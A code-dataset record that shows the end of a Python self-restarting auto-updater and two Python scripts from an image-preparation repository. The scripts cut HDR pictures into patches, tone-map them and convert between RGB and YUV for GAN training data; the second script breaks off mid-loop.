if new_commit_hash != commit_hash:
restart()
with update_condition:
update_condition.wait(INTERVAL)
def restart():
if hasattr(atexit, "_run_exitfuncs"):
# We're about to leave in a way that's not expected by
# Python.
# This means that some things, including atexit callbacks,
# won't be run.
# We want them to run because ircbot.py relies on them, so
# this is our kind-of CPython hack.
atexit._run_exitfuncs()
os.execlp(sys.executable, sys.executable, filepath)
def initialize():
# TODO: Not use globals.
global filepath
# Initialize the auto-updater. Must be called in the main script.
parent_globals = inspect.currentframe().f_back.f_globals
assert parent_globals["__name__"] == "__main__"
filepath = parent_globals["__file__"]
threading.Thread(target=_worker).start()
``` |
{
"source": "8bignic8/MdataPicPrep",
"score": 3
} |
#### File: 8bignic8/MdataPicPrep/main_format.py
```python
import h5py as h5
import hdf5storage
import numpy as np
import imageio
import mat73
import os
import cv2
import random
import time
import argparse
#from IPython import display
#from IPython.display import Image, display
# In[ ]:
#Read Picture and return it
def readThePicture(picturepath):
# open ImageObject
try:
img = cv2.imread(picturepath, cv2.IMREAD_UNCHANGED)# | cv2.IMREAD_ANYCOLOR | cv2.IMREAD_ANYDEPTH)
#old
#imageio.plugins.freeimage.download()
#img=imageio.imread(picturepath) #liest Bild von picturepath
except:
print('There was an error while reading the picture')
img = 0
return(img) #returns picture
# In[ ]:
def tMO(file,name): #tonemapping the file
try:
if (name == 'reinhard'):
print('Reinhard')
intensity=-1.0
light_adapt=0.8
color_adapt=0.0
gamma=2.0
tmo = cv2.createTonemapReinhard(gamma=gamma, intensity=intensity, light_adapt=light_adapt, color_adapt=color_adapt)
#([, gamma[, intensity[, light_adapt[, color_adapt]]]]) https://www.kite.com/python/docs/cv2.createTonemapReinhard#
if (name == 'mantiuk'):
print('Mantiuk')
saturation=1.0
scale=0.75
gamma=2.0
tmo = cv2.createTonemapMantiuk(saturation=saturation, scale=scale, gamma=gamma)
if (name == 'drago'):
print('Drago')
saturation=1.0
bias=0.85
gamma=2.0
tmo = cv2.createTonemapDrago(saturation=saturation, bias=bias, gamma=gamma)
if (name == 'linear'):
print('Linear')
gamma=2.0
tmo = cv2.createTonemap(gamma=gamma)
except:
print('ToneMapping Error')
ldr = tmo.process(file)
return ldr
# In[ ]:
def Randtone_map(choose):
#a random tonemapping is returned
rand = random.SystemRandom()
if (choose >= 4):
tmNumber = round((rand.randint(0, 30)/10)) # generates a random tonempaiing nuber
else:
tmNumber = choose
try:
if (tmNumber<=0):
return 'reinhard' #retruns the name of the tonemapper
if (tmNumber==1):
return 'mantiuk'
if (tmNumber==2):
return 'drago'
if (tmNumber>=3):
return 'linear'
except:
print('there was an tmo Error')
#ToDo Output in CSV to later analize
# In[ ]:
def convert(img, target_type_min, target_type_max): # converts the input array to a target type with the bounderys given
imin = img.min()
imax = img.max()
#print(imin)
a = (target_type_max - target_type_min) / (imax - imin) # generates a factor a to multiply with the img
b = target_type_max - a * imax
new_img = (a * img + b)
return new_img
# In[ ]:
def savePic(picture,fileName,extention,outPath): #saves the given array as a pictures to the given output path
#print('here:)')
outPath = outPath+fileName+'.'+extention
#print(outPath)
try:
#old
#imageio.imwrite(outPath,picture,format=extention)#extention'')#save the Data (path with name and file extention,PictureMatrix,format)
#new
print(picture.shape)
print('writePicture')
cv2.imwrite(outPath,picture)
print(outPath+'<=== Writing')
except:
print('Failed while saving picture: '+fileName+' to '+ outPath+' sorry :(')
print('--------------------')
# In[ ]:
def cutPatchxy(begX,endX,begY,endY,picyx):#cuts out a array of a given array
try:
#print('CUTTTING')
#print(picyx.shape)
#print(begY-endY,begX-endX)
picyx = picyx[endY:begY,endX:begX] #format x,start:End | y,start:End
#print(picyx.shape)
except:
print('FormatMaking Failed')
return picyx #returns a small part of the pic file
# In[ ]:
def totalpatchespossible(path,amountOfPictures,extention,px,py,tokonvPic): #calculates the amount of total possible patches of the path you picked
arraysize = 0 #zero the output
amountOfPictures = amountOfPictures - 1
tokonvPic= (amountOfPictures-(tokonvPic))+1 #generates the stop argument
while (amountOfPictures) >= tokonvPic:
try:
helping = os.listdir(path)[amountOfPictures].split('.')[1] #reading the File extention
if ( helping == extention): #only counts files with the same extention
he = (path+str(os.listdir(path)[amountOfPictures])) #reading path to picture
print(he) #prints the name of the picture what is currently been read
readPic = readThePicture(he)
arraysize = arraysize + (int(readPic.shape[1]/px)*int(readPic.shape[0]/py))# calculate the whole size an cut away the rest even when 0.9
except:
print('fail count all patches')
amountOfPictures = amountOfPictures - 1
print('There will be >> '+str(arraysize)+' << total patches')
return arraysize
# In[ ]:
def patchesyx(inputpic,py,px): #calculates how often the array can be devided by px in x and py in y
arraysize = []
try:
y = int(inputpic.shape[0]/py)# calculates the number of patches in the Y-axses cuts the picture i
#print('y'+str(inputpic.shape[1]))
x = int(inputpic.shape[1]/px)
#print('x'+str(inputpic.shape[0]))
arraysize = (y,x)
except:
print('fail calc x and y')
return arraysize
# In[ ]:
def resizePic(inputpic,factor): #reszizing the inputpic picture keeping the information but scaling it down
y = int((inputpic.shape[0])/factor) #multiply the Factor in X[0],Y[1] config
x = int((inputpic.shape[1])/factor) #multiply the Factor
dim = (x, y)
#print(inputpic.shape)
#inputpic = np.reshape(inputpic,(inputpic.shape[1],inputpic.shape[0],inputpic.shape[2])) #rotate 180degree
pic = cv2.resize(inputpic,dim, interpolation = cv2.INTER_AREA)
#print('Reshaped'+str(pic.shape))
return pic
# In[ ]:
# In[ ]:
def RGBtoYUV(img): #changeing the img picture from RGB- to YUV-Color space
pictureYUV = cv2.cvtColor((img), cv2.COLOR_BGR2YUV, cv2.IMREAD_UNCHANGED)
#pictureRGB = cv2.cvtColor(img, cv2.COLOR_YUV2BGR)
#different Method
#im_rgb = img.astype(np.float32)
#im_ycrcb = cv2.cvtColor(im_rgb, cv2.COLOR_RGBE2YCR_CB)
#im_ycbcr = im_ycrcb[:,:,(0,2,1)].astype(np.float32)
#im_ycbcr[:,:,0] = (im_ycbcr[:,:,0]*(235-16)+16)/255.0 #to [16/255, 235/255]
#im_ycbcr[:,:,1:] = (im_ycbcr[:,:,1:]*(240-16)+16)/255.0 #to [16/255, 240/255]
return pictureYUV
# In[ ]:
def YUVtoRGB(img):#changeing the img picture from YUV- to RGB-Color space
#pictureRGB = cv2.cvtColor(img, cv2.COLOR_YUV2RGB, cv2.IMREAD_UNCHANGED)
#https://stackoverflow.com/questions/26480125/how-to-get-the-same-output-of-rgb2ycbcr-matlab-function-in-python-opencv
#https://docs.opencv.org/3.4/d8/d01/group__imgproc__color__conversions.html
pictureRGB = cv2.cvtColor((img), cv2.COLOR_YUV2BGR, cv2.IMREAD_UNCHANGED)
return pictureRGB
# In[ ]:
#TO Finish
def inputargs():#todo finish
parser = argparse.ArgumentParser()
parser.add_argument('--foo', help='foo help')
args = parser.parse_args()
# In[ ]:
# this function should return an random array with
def randArray(allPatches, patchPerPic):
patchRandArray = np.zeros((patchPerPic)) #generates the array
rand = random.SystemRandom() #starts the rand generator
while(patchPerPic > 0):
patchnNum = round(rand.randint(0, allPatches)) #
if (not(patchnNum in patchRandArray)): #if number is not in array already
patchRandArray[patchPerPic-1] = patchnNum #write it in
patchPerPic = patchPerPic -1
return patchRandArray
# In[ ]:
def returnPosFromNumberXY(xMax,yMax, pos): #should return one coordinat in x and y cunts up from 0 to pos-1
#allpos = xMax*yMax
pos = pos-1
x = 0
y = 0
#print(x,y)
y = pos // yMax #modulo
#print(x,y)
x = pos % yMax
#print(x,y)
return x,y
# In[ ]:
#piccc = readThePicture('/home/nico/programm/MdataPicPrep/sdrOut/000000.png')
#piccc = RGBtoYUV(piccc)
#savePic(piccc,'fileName_asdsad2222as','png',"/home/nico/programm/MdataPicPrep/sdrOut/")
# In[ ]:
# In[ ]:
#---- input section
#TO DO add parser
path = ''
print('This skript uses a folder and converts the pictures in smaler random Patches in YUV or RGB color space, Use same size file to avoid errors')
#data extention of the input data
extention = input('What fileextention is supposed to be put into patches(e.g. hdr, png) [default: hdr: ]') or 'hdr'
print(extention)
#Where are the rawData at?
path = input('Where is the Path to the pictures (should be .hdr) [default: ./hdrInput/]') or './hdrInput/'
if not os.path.exists(path):
os.mkdir(path)
print(path)
amountOfPictures = 0
keepFileName = input('Do you want to keep the original filename? default: no ') or 'no'
amountOfPictures = sum(1 for f in os.listdir(path) if f.endswith('.'+extention)) #summ all data ending with right extention
print('There are: '+str(amountOfPictures)+' '+extention+' Pictures in the folder')
#User can choose how many pictures should be cut in patches
tokonvPic = int(input('how many Pictures do you want to cut into patches? default 1: ') or '1')
print(str(tokonvPic)+' pictures will be cut into patches')
#scale factor for the low resolution is inputed
factor = int(input('Scale factor for Ldr LR [default:2]: ') or "2")
#asks for the px size of the high resolution pictures
fristPic = (readThePicture(path+str(os.listdir(path)[0])))
print('The first picture has the shape (y,x, color)'+str(fristPic.shape))
fristPic
xaxis = (int(int(fristPic.shape[1])/420))*420
yaxis = (int(int(fristPic.shape[0])/420))*420
print('Files will be scaled not cut. :)')
yaxis = int(input('Y Patch size from HDR HR Patch in py [default: '+str(yaxis)+' pixel]: ') or yaxis)
print(yaxis)
xaxis = int(input('X Patch size from HDR HR Patch in px [default: '+str(xaxis)+' pixel]: ') or xaxis)
print(xaxis)
toneMapper = int(input('Wich tonemapper should be used: 0:reinhard, 1:mantiuk, 2:drago, 3:linear, 4>=: random: default:0') or "0")
#user can choose if the pacht-pictures should be in YU-V or RGB
youWantYUV = input('Do you want to convert to yuv default: no ') or 'no'
#user can coose in wich folder the .mat file is stored
savein = input('Should patches be saved in .mat file type: (m) oder should ist be saved as pictures (p) or saved as mat and .hdr/.png type: (mp), [default: p] ') or 'p'
print(savein)
unit_varSdr = (np.float32)
unit_varHdr = (np.float32)
testing = input('Is the dataset for testing purposes of the JSI-GAN? default: yes') or 'yes'
if (savein == 'p' or savein == 'mp'):
hrImgOut = input('Should the hdr pictures have the format .hdr (yes) or .png with 16bit (no)? default: no (png 16bit)') or 'no'
if (savein == 'm' or savein == 'mp'):
#user can choose the name for the .mat file
matName = input('Output Mat name default: data ') or 'data'
matPath = input('Output Mat directory path: ./matOut/ ') or './matOut/'
if not os.path.exists(matPath):
os.mkdir(matPath)
jsi = input('Is it for the JSI-GAN converion from float32 to uint8/16? default: yes ') or 'yes'
if (jsi != 'no'):
unit_varSdr = (np.uint8)
print('SDR .mat file will be uint8')
unit_varHdr = (np.uint16)
print('HDR .mat file will be uint16')
if (savein == 'p' or savein == 'mp' or savein == 'm'): #if user wants to output pates in picters he can choose where
outPathsdr = input('spezify the output path of sdr pictures [default: ./sdrOut/ ] ') or './sdrOut/' #set the picture save path if it is choosen
rgb_sdr = outPathsdr+'rgb/'
outPathsdr = outPathsdr+'YUV/'
if not os.path.exists(outPathsdr):
os.mkdir(outPathsdr)
if not os.path.exists(rgb_sdr):
os.mkdir(rgb_sdr)
outPathhdr = input('spezify the output path of sdr pictures [default: ./hdrOut/ ] ') or './hdrOut/' #set the picture save path if it is choosen
rgb_hdr = outPathhdr+'rgb/'
outPathhdr = outPathhdr+'YUV/'
if not os.path.exists(outPathhdr):
os.mkdir(outPathhdr)
if not os.path.exists(rgb_hdr):
os.mkdir(rgb_hdr)
if ((input('do you want to know all patches possible? default: no') or 'no')!='no'):
allpatches = totalpatchespossible(path,amountOfPictures,extention,xaxis,yaxis,tokonvPic) #calc all output patches
patchAmount = input('How many patches do you want to cut out of each Picture? default: 1 ') or '1'
# In[ ]:
start_time = time.time() #start the timeing of the Prgramm
### write pic to .mat and/or .hdr/.png
#Just for general information Data Structure JSI-Gan
###['SDR_data'],[79Y][79X][2C],[39839Num] dtype=uint8 Strukture .mat Data
###
###['HDR_data'][159][159][2][39839] dtype=uint16 Strukture .mat Data
#---- programm section
allpatches = int(patchAmount)*int(tokonvPic) # calculates the amount of pictures total
print('That will be ==> '+str(allpatches)+' Patches in total :)')
xldr = int(xaxis/factor) #calculates the samler array axes x
yldr = int(yaxis/factor)#calculates the samler array axes y
#print('XAch'+str(xaxis))
#print('YAch'+str(yaxis))
if (savein == 'm' or savein == 'mp'):
hdrarray = np.zeros((yaxis,xaxis,3,allpatches))#create empty np array of the size of allpatches
hdrarray = hdrarray.astype(unit_varHdr) #changes the type of np array to uint16
sdrarray = np.zeros((yldr,xldr,3,allpatches)) # creates the np array for the LR SDR array with new axes
sdrarray = sdrarray.astype(unit_varSdr)#changes the type of np array to uint8
#Arrays are defined in [amountOfallPatchesPossible,x,y,RGB]
print('Start processing...')
tokonvPic= (int(amountOfPictures)-int(tokonvPic))# the amount of pictures cut into pachtes is calculated
#print(tokonvPic)
#print(amountOfPictures)
while (amountOfPictures > tokonvPic):#tokonvPic): #filling Array with pachtes from high to low, beginning with the hightes Number
currentFile = os.listdir(path)[amountOfPictures-1] #currentFile holds the name of the current position file
try:
if (currentFile.split('.')[1] == str(extention)): #checks if file is ending as wanted
he = (path+str(currentFile))#gives the path and name with extention of the to process file
print('processing the picture: '+he) #prints it to the user
originalPicture = readThePicture(he) #reads the currentpicture and saves it y,x
##### Resizes the Picture to fit mutible of 420
xSize = (int(int(originalPicture.shape[1])/420))*420
#print('x'+str(xSize))
ySize = int(originalPicture.shape[0]/420)*420
#print('y'+str(ySize))
originalPicture = cv2.resize(originalPicture,(xSize,ySize), interpolation = cv2.INTER_AREA)
#print(originalPicture.shape)
#originalPicture = np.reshape(originalPicture,(int(originalPicture.shape[1]),int(originalPicture.shape[0]),int(originalPicture.shape[2]))) #rearanging in XYC
pyx=patchesyx(originalPicture,yaxis,xaxis) # gives back the length of the current picture (numx,numy) e.g. (3,2)
#print('YX'+str(pyx))
px= pyx[1] #saves the max x pos in px
py= pyx[0] #saves the max y pos in py
patchCuts = randArray((px*py),int(patchAmount))# returns a array with amount patchAmount and the random positions to cut
#print(patchCuts)
aktPatch = 0
savePXY = px,py
while (aktPatch < int(patchAmount)): # cut until you are at the beginning of the picture X position
randPosYX = returnPosFromNumberXY((savePXY[0]),(savePXY[1]),int(patchCuts[(aktPatch)])) #returns the x,y coordinate within a given position
#print('randPosYX')
#print(randPosYX)
aktPatch = aktPatch + 1
begy = randPosYX[0]* yaxis #is the new begin Pos in y
begx = randPosYX[1]* xaxis #is the new begin Pos in x
#print('Xaxis')
#print(xaxis)
px = begx + xaxis #is the new end Pos in x
py = begy + yaxis #is the new end Pos in Y
#print('Position:')
#print(px,py,begx,begy)
patch = cutPatchxy(px,begx,py,begy,originalPicture) #begX,endX,begY,endY,picyxmake the patch and return it to the patch (floart64) array
#print(patch.shape)
###choose your option
#HDR original with float32
hdr = patch
#HDR original in YUV
hdr_yuv = RGBtoYUV(hdr)
#HDR in uint16 with 10bit
hdr_png = np.clip((hdr*((2**10)-1)), 0, ((2**10)-1)).astype(np.uint16)
hdr_png_16bit = np.clip((hdr*((2**16)-1)), 0, ((2**16)-1)).astype(np.uint16)
#HDR in uint16 and yuv
hdr_png_yuv = np.clip((hdr_yuv*((2**10)-1)), 0, ((2**10)-1)).astype(np.uint16)
##SDR area
#choose tonemapping
tmo = Randtone_map(toneMapper)
#building the pictures
sdr_32 = tMO(hdr,tmo) # as float 32
sdr_32_8bit = np.clip((sdr_32*((2**8)-1)), 0, ((2**8)-1)).astype(np.uint8)
sdr_32_fac = resizePic(sdr_32,factor)
#SDR_lr
ldr_8 = np.clip((sdr_32_fac*((2**8)-1)), 0, ((2**8)-1)).astype(np.uint8)
#SDR_lr in YUV
ldr_8_yuv = (RGBtoYUV(((ldr_8).astype(np.uint8))).astype(np.uint8))
####Color YUV Section
if (savein == 'p' or savein == 'mp'): #save as picture if chosen
if(keepFileName == 'yes' ):
buildFilename = ((currentFile.split('.')[0])+'_'+str(allpatches-1))# dont delete builds output name
buildFilename = str(allpatches-1).zfill(6)# gives the filename only an number filled up with 6 zeros (mybe better if zeros from max allpatches)
##Compare picture in RGB
savePic(hdr_png_16bit,buildFilename,'png',rgb_hdr) #check Picture
savePic(ldr_8,'lr_'+buildFilename,'png',rgb_sdr) #check Picture
savePic(sdr_32_8bit,buildFilename,'png',rgb_sdr)
savePic(sdr_32,'yuv'+buildFilename,'png',rgb_sdr)
if(youWantYUV != 'no'):
# TODO Add a Input for the wanted out_format
if(testing != 'no'):
spaceIndi = 'y','u','v' #orders the Name to the right place
savePic((ldr_8_yuv[:,:,0]),(str(allpatches-1)+'-'+spaceIndi[0]),'png',outPathsdr)#saves final singel color channel Picture y
savePic((ldr_8_yuv[:,:,1]),(str(allpatches-1)+'-'+spaceIndi[1]),'png',outPathsdr)#saves final singel color channel Picture u
savePic((ldr_8_yuv[:,:,2]),(str(allpatches-1)+'-'+spaceIndi[2]),'png',outPathsdr)#saves final singel color channel Picture v
####Saveing the 16Bit HDR picturespatches
if(hrImgOut !='no'):
savePic((hdr_yuv[:,:,0]),(str(allpatches-1)+'-'+spaceIndi[0]),'hdr',outPathhdr)#saves final singel color channel Picture
savePic((hdr_yuv[:,:,1]),(str(allpatches-1)+'-'+spaceIndi[1]),'hdr',outPathhdr)#saves final singel color channel Picture
savePic((hdr_yuv[:,:,2]),(str(allpatches-1)+'-'+spaceIndi[2]),'hdr',outPathhdr)#saves final singel color channel Picture
##Compare picture
hdr_yuv_vis = hdr_yuv.astype(np.float32)
savePic(hdr_yuv_vis,'YUV_'+buildFilename,'hdr',rgb_hdr) #check Picture in HDR_YUV_HR
#Saveing the 16Bit PNG output picturepachtes
if(hrImgOut == 'no'):
savePic((hdr_png_yuv[:,:,0]),(str(allpatches-1)+'-'+spaceIndi[0]),'png',outPathhdr)#saves final singel color channel Picture
savePic((hdr_png_yuv[:,:,1]),(str(allpatches-1)+'-'+spaceIndi[1]),'png',outPathhdr)#saves final singel color channel Picture
savePic((hdr_png_yuv[:,:,2]),(str(allpatches-1)+'-'+spaceIndi[2]),'png',outPathhdr)#saves final singel color channel Picture
##Compare picture
comp = np.clip(((hdr_png_yuv/((2**10)-1))*((2**16)-1)), 0, ((2**16)-1)).astype(np.uint16) #upconverting to make is visable
savePic(comp,'YUV_'+buildFilename,'png',rgb_hdr) #check Picture
if(testing == 'no'):
if(hrImgOut == 'no'):
savePic(hdr_png_yuv,buildFilename,'png',outPathhdr)#change 'hdr' here for different HDR-picture save
if(hrImgOut != 'no'):
savePic(hdr_yuv,buildFilename,'hdr',outPathhdr)#change 'hdr' here for different HDR-picture save
savePic(ldr_8_yuv,buildFilename,'png',outPathsdr)#chnage 'png' here for different LDR-picture save
#########Normal Section
if(youWantYUV == 'no'):
print('yuV_no')
# TODO Add a Input for the wanted out_format
if(testing != 'no'):
spaceIndi = 'y','u','v' #orders the Name to the right place
savePic((ldr_8[:,:,0]),(str(allpatches-1)+'-'+spaceIndi[0]),'png',outPathsdr)#saves final singel color channel Picture y
savePic((ldr_8[:,:,1]),(str(allpatches-1)+'-'+spaceIndi[1]),'png',outPathsdr)#saves final singel color channel Picture u
savePic((ldr_8[:,:,2]),(str(allpatches-1)+'-'+spaceIndi[2]),'png',outPathsdr)#saves final singel color channel Picture v
savePic(ldr_8,buildFilename,'png',outPathsdr) #check Picture
####Saveing the 16Bit HDR picturespatches
if(hrImgOut !='no'):
savePic((hdr[:,:,0]),(str(allpatches-1)+'-'+spaceIndi[0]),'hdr',outPathhdr)#saves final singel color channel Picture
savePic((hdr[:,:,1]),(str(allpatches-1)+'-'+spaceIndi[1]),'hdr',outPathhdr)#saves final singel color channel Picture
savePic((hdr[:,:,2]),(str(allpatches-1)+'-'+spaceIndi[2]),'hdr',outPathhdr)#saves final singel color channel Picture
savePic(hdr,buildFilename,'hdr',outPathhdr) #check Picture
#Saveing the 16Bit PNG output picturepachtes
if(hrImgOut == 'no'):
print('(HDR)-PNG is 16 bit')
savePic((hdr_png[:,:,0]),(str(allpatches-1)+'-'+spaceIndi[0]),'png',outPathhdr)#saves final singel color channel Picture
savePic((hdr_png[:,:,1]),(str(allpatches-1)+'-'+spaceIndi[1]),'png',outPathhdr)#saves final singel color channel Picture
savePic((hdr_png[:,:,2]),(str(allpatches-1)+'-'+spaceIndi[2]),'png',outPathhdr)#saves final singel color channel Picture
savePic(hdr_png,buildFilename,'png',outPathhdr) #check Pic
if(testing == 'no'):
if(hrImgOut == 'no'):
savePic(hdr_png,buildFilename,'png',outPathhdr)#change 'hdr' here for different HDR-picture save
if(hrImgOut != 'no'):
savePic(hdr,buildFilename,'hdr',outPathhdr)#change 'hdr' here for different HDR-picture save
savePic(ldr_8,buildFilename,'png',outPathsdr)#chnage 'png' here for different LDR-picture save
###writing SDR array section
p = (allpatches-1) #calcualte current patch position
if (savein == 'm' or savein == 'mp'):
try:
if((youWantYUV == 'no') and (jsi == 'no')):
print('RGB_noJSI')
sdrarray[:,:,:,p] = ldr_8 # clipped the tmoed Picture to 0,1
hdrarray[:,:,:,p] = hdr # try Write the Patch to hdrarray at current patch position
if((youWantYUV != 'no') and (jsi == 'no')):
print('YUV_noJSI')
sdrarray[:,:,:,p] = ldr_8_yuv # clipped the tmoed Picture to 0,1
hdrarray[:,:,:,p] = hdr_yuv # try Write the Patch to hdrarray at current patch position
if((youWantYUV == 'no') and (jsi != 'no')):
print('RGB_JSI')
sdrarray[:,:,:,p] = ldr_8 # try Write the tmoed Patch to sdrarray at current patch position
hdrarray[:,:,:,p] = hdr_png # try Write the Patch to hdrarray at current patch position
if((youWantYUV != 'no') and (jsi != 'no')):
print('YUV_JSI')
sdrarray[:,:,:,p] = ldr_8_yuv # try Write the tmoed Patch to sdrarray at current patch position
hdrarray[:,:,:,p] = hdr_png_yuv # try Write the Patch to hdrarray at current patch position
except:
print('Error at Array Writing :..(')
print(str(originalPicture.shape)+'OrgPicShape')
print('BeginHereX '+str(begx)+' to '+str(px))
print('beginHereY '+str(begy)+' to '+str(py))
print(str(patchCuts.shape)+' PatchCutsAmaount')
print(str(aktPatch)+' PatchPos')
print(str(patchCuts[(aktPatch)])+' PatchCuts_pos')
print(str(patch.shape)+' hdrPatchShape')
print(str(png_lr_tmo.shape)+' sdrPatchShape')
allpatches = allpatches - 1 #Counts down all patches of all pictures to 0
print('Patch === '+str(allpatches)+' ==> Done')
else:
print('Error with data maybe not an .hdr file continuing...')
amountOfPictures = amountOfPictures + 1 #couning up the total end goals if not the given input format
tokonvPic = tokonvPic + 1 #couning up the total end goals
except:
try:
print(str(originalPicture.shape)+'OrgPicShape')
print('BeginHereX '+str(begx)+' to '+str(px))
print('beginHereY '+str(begy)+' to '+str(py))
print(str(patchCuts.shape)+' PatchCutsAmaount')
print(str(aktPatch)+' PatchPos')
print(str(patchCuts[(aktPatch)])+' PatchCuts_pos')
print(str(patch.shape)+' hdrPatchShape')
print(str(png_lr_tmo.shape)+' sdrPatchShape')
except:
print('Error with data maybe not an .hdr file continuing...')
print(str((time.time() - start_time)/60)+' Minutes have pased and '+str(allpatches)+' patches togo :)') #outputs the time in minutes
amountOfPictures = amountOfPictures - 1 #counts down current picture pos
if (savein == 'mp' or savein == 'm' ): #only makes a Matlap File if wanted
try:
matLabel = 'HDR_data'
if(testing != 'no'):
matLabel = 'HDR_YUV'
print('testdata')
# Write TO HDR.Mat File
h5.get_config().default_file_mode = 'a' #write enable
matfilehdrdataHDR = {} # make a dictionary to store the MAT data in
print('HDR Matlab file will have the format')
print(hdrarray.shape)
matfilehdrdataHDR[u''+matLabel] = hdrarray #save hdr array in that dictonary
print('Writing HDR_'+matName+'.mat File to: '+ matPath)
hdf5storage.write(matfilehdrdataHDR, '.', matPath+'HDR_'+matName+'.mat', matlab_compatible=True) #output the .mat data file
print('Saved the HDR .mat file')
#####Writing SDR .mat
#Switches the first with the last array Field
matfilesdrdatasdr = {} # make a dictionary to store the MAT data in
matLabel = 'SDR_data'
if(testing != 'no'):
matLabel = 'SDR_YUV'
print('testdata')
print('SDR Matlab file will have the format')
print(sdrarray.shape)
matfilesdrdatasdr[u''+matLabel] = sdrarray #save sdr array in that dictonary
print('Writing SDR_'+matName+'.mat File to: '+ matPath)
hdf5storage.write(matfilesdrdatasdr, '.', matPath+'SDR_'+matName+'.mat', matlab_compatible=True) #output the .mat data file
print('Saved the SDR .mat file')
except:
print('error at writing matlab file sorry :(')
sdrpro = (np.count_nonzero(sdrarray)/sdrarray.size)*100
print(str(sdrpro)+'% of SDRarray numbers are bigger than 0')
sdrpro = (np.count_nonzero(hdrarray)/hdrarray.size)*100
print(str(sdrpro)+'% of HDRarray numbers are bigger than 0')
print(str((time.time() - start_time)/60)+' Minutes') #outputs the time in minutes
print('------------------------- Done --------------------')
# In[ ]:
#ab = readThePicture('/Users/littledragon/Documents/BA 13022020/programme/MdataPicPrep/sdrOut/000003.png')
#ldr_8_b = (RGBtoYUV(((ldr_8).astype(np.uint8))).astype(np.uint8))
#hdr_png_yuv_b = (ldr_8_b).astype(np.uint8)#*127
#savePic(ldr_8_b,'fileName_letMeTink','png','./sdrOut/')
#ab = (YUVtoRGB(((ldr_8_b).astype(np.uint8))).astype(np.uint8))
#ab = YUVtoRGB(ab)
#savePic((ab),'fileName_letMeTink_rgb','png','./sdrOut/')
#ab = (ab/255).astype(np.float32)
#savePic((ab),'fileName_letMeTink_rgb_hdr','hdr','./sdrOut/')
#hdr_png_yuv_b.max()
# In[ ]:
#hdr_png = hdr*((2**10)-1)
#hdr_png_yuv_c = ((hdr)*((2**16)-1)).astype(np.uint16)
#hdr_png_yuv_c = RGBtoYUV(hdr_png_yuv_c)
#hdr_png_yuv_b = (hdr_png_yuv_c*((2**1)-1)).astype(np.uint16)#*127
#savePic(hdr_png_yuv_c,'fileName_letMeTink','png','./sdrOut/')
#ab = (YUVtoRGB(hdr_png_yuv_c*((2**1)-1)).astype(np.uint16))
#ab = YUVtoRGB(ab)
#savePic((ab),'fileName_letMeTink_rgb','png','./sdrOut/')
#ab = (ab/((2**16)-1)).astype(np.float32)
#savePic((ab),'fileName_letMeTink_rgb_hdr','hdr','./sdrOut/')
#HDR_test = YUVtoRGB((hdr_png_yuv/((2**10)-1)).astype(np.float32))
#savePic(HDR_test,'fileName_letMeTink_rgb_hdr_org','hdr','./sdrOut/')
#hdr_png_yuv_c.max()
```
#### File: 8bignic8/MdataPicPrep/StichingSingleYUVtoRGB.py
```python
import argparse, os
import cv2
import numpy as np
import imageio
import time
# In[40]:
def readPicture(picturepath):
# open ImageObject
img = cv2.imread(picturepath, cv2.IMREAD_UNCHANGED)#cv2.IMREAD_UNCHANGED is important that the output is (x,y,ChannelRGB)
#print(img.shape)
#alternative
#img=imageio.imread(picturepath) #liest Bild von picturepath
return(img)
# In[6]:
def savePic(picture,fileName,extention,outPath):
outPath = outPath+fileName+'.'+extention # combines the path with the name and extention of the file
print(outPath)
try:
#imageio.imwrite(outPath,picture,format=extention)# old way
cv2.imwrite(outPath,picture)#saves Pictures
except:
print('Failed while saving picture: '+fileName+' to '+ outPath+' sorry :(') #writes an error
print('--------------------')
# In[7]:
def YUVtoRGB(img):
pictureYUV = cv2.cvtColor(img, cv2.COLOR_YUV2RGB, cv2.IMREAD_UNCHANGED) #uses the CV2 method to convert the color space from YU-V to RGB
return pictureYUV
# In[8]:
def RGBtoYUV(img):
pictureYUV = cv2.cvtColor(img, cv2.COLOR_RGB2YUV, cv2.IMREAD_UNCHANGED) #uses the CV2 method to convert the color space from RGB to YU-V
return pictureYUV
# In[9]:
def convert(img, target_type_min, target_type_max, target_type):
imin = img.min() # searches for the smalest number in the img array and saves it in imin
imax = img.max() # searches for the biggest number in the img array and saves it in imax
a = (target_type_max - target_type_min) / (imax - imin) # creates ratio of wanted to actual number value space
b = target_type_max - a * imax # Creates the maximal possible value in b
try:
new_img = (a * img + b).astype(target_type) # recalculates the image with the calculated values and sets the new type
except:
print('error while converting the image')
return new_img
# In[34]:
def hdrorpng(extention,yuvPic):
if (extention == 'hdr'): # when hdr than normalize in values between 0 and 1
yuvPic = convert(yuvPic, 0, 1, np.float32) # send to convert in float 32 // Just devide by (2 ** 10) - 1?
if (extention == 'png'): # when hdr than normalize in values between 0 and 255
yuvPic = convert(yuvPic, 0, 255, np.uint8) # normalisation to unit8
return yuvPic
# In[18]:
#toDo Add parser with args
###### Imput section
path = input('Path to pictures who should be converted defaut: ./yuvPic/: ') or './yuvPic/'
inputextention = input('What fileextention do the to read pictures have? [default: png]') or 'png'
outputextention = input('Please type outputextention[default: hdr]: ') or 'hdr'
outputpath = input('Where to write the stiched pictures to? [default: ./hdrOut/]: ') or './hdrOut/'
namePic = input('What should be the name of the stiched pictures? [default: pred]') or 'predictedPic'
wantYUV = input('Do you want to keep YUV color space type y? [deflaut: no (RGB_color space)]') or 'no'
aOp = sum(1 for f in os.listdir(path) if f.endswith('.'+inputextention)) #summ all ending with extention
# In[37]:
#Working Version 10022021
start_time = time.time() #start Timer
print('Pictures in the folder need to have the format: [number]-[y]or[u]or[v].png e.g. : 28-y_pred.png,28-u_pred.png,28-v_pred.png')
#TO DO Parser
#desc ='yuv to RGB'
#parser = argparse.ArgumentParser(description=desc)
#parser.add_argument('--yuv', type=str, default='./', help='path to Folder of yuv images')
#print(parser.parse_args())
#what, b = parser.parse_known_args()
#if what.yuv == './' :
# print('yes')
start_time = time.time()
i = 0
print(aOp)
while (i <= aOp-1 ): # read y
if ((str(os.listdir(path)[i]).split('-')[1]).split('_')[0]) == 'y': # only searching for y picitures
name = os.listdir(path)[i] #finding the Name
print(name +' should be the Y')
picpath = path + name #combining Name and path
picy = readPicture(picpath) #reads a pic y to find the x,y axes should be the same for all pictures
yuvPic = np.zeros((int(picy.shape[0]),int(picy.shape[1]),3)) # generates the x and y achses and channels of picture
yuvPic[:,:,1] = picy # packs the Y in pos 1
num = (str(os.listdir(path)[i]).split('-')[0])#.split('_')[0]
newPic = path + num + '-u_'+name.split('_')[1]
picu = readPicture(newPic)#reads a picture with Ending U
yuvPic[:,:,0] = picu # packs the u in pos 0
